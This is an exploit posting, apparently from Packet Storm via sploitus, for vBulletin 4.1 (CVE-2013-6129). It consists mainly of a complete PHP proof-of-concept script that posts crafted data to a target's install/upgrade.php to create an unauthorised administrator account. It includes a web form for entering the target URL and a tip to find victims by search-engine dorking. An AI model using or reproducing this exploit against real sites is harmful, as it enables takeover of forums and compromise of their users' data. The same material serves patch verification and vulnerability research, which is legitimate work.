Share
## https://sploitus.com/exploit?id=PACKETSTORM:189646
=============================================================================================================================================
| # Title : vBulletin 4.1 create new administrator account Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.vbulletin.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Vulnerability in vBulletin to create new administrator account.
(Related : https://packetstorm.news/files/id/180859/ Linked CVE numbers: CVE-2013-6129 ) .
[+] save code as poc.php.
[+] USage : http://127.0.0.1/poc.php
[+] PayLoad :
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$username = $_POST["username"];
$password = $_POST["password"];
$email = $_POST["email"];
$target_uri = $_POST["target_uri"];
if ($username === $password) {
$message = " يجب أن تكون كلمة المرور مختلفة عن اسم المستخدم!";
} else {
// بيانات الطلب
$post_data = http_build_query([
'version' => 'install',
'response' => 'true',
'checktable' => 'false',
'firstrun' => 'false',
'step' => '7',
'startat' => '0',
'only' => 'false',
'options[skiptemplatemerge]' => '0',
'reponse' => 'yes',
'htmlsubmit' => '1',
'htmldata[username]' => $username,
'htmldata[password]' => $password,
'htmldata[confirmpassword]' => $password,
'htmldata[email]' => $email
]);
// تنفيذ الطلب
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_uri);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// فحص النجاح
if ($http_code == 200 && strpos($response, "Administrator account created") !== false) {
$message = " تم إنشاء الحساب بنجاح!<br>اسم المستخدم: <b>$username</b><br>كلمة المرور: <b>$password</b>";
$alert_class = "alert-success";
} else {
$message = " فشل في إنشاء الحساب!";
$alert_class = "alert-danger";
}
}
}
?>
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>إنشاء حساب مسؤول vBulletin</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body class="bg-light">
<div class="container mt-5">
<div class="card shadow-lg">
<div class="card-header bg-primary text-white text-center">
<h3>إنشاء حساب مسؤول vBulletin</h3>
</div>
<div class="card-body">
<?php if (!empty($message)) : ?>
<div class="alert <?= $alert_class ?? 'alert-warning' ?>"><?= $message ?></div>
<?php endif; ?>
<form method="POST">
<div class="mb-3">
<label class="form-label">رابط vBulletin المستهدف:</label>
<input type="text" name="target_uri" class="form-control" required placeholder="مثال: http://target.com/install/upgrade.php">
</div>
<div class="mb-3">
<label class="form-label">اسم المستخدم:</label>
<input type="text" name="username" class="form-control" required>
</div>
<div class="mb-3">
<label class="form-label">كلمة المرور:</label>
<input type="password" name="password" class="form-control" required>
</div>
<div class="mb-3">
<label class="form-label">البريد الإلكتروني:</label>
<input type="email" name="email" class="form-control" required>
</div>
<button type="submit" class="btn btn-success w-100">إنشاء الحساب</button>
</form>
</div>
</div>
</div>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================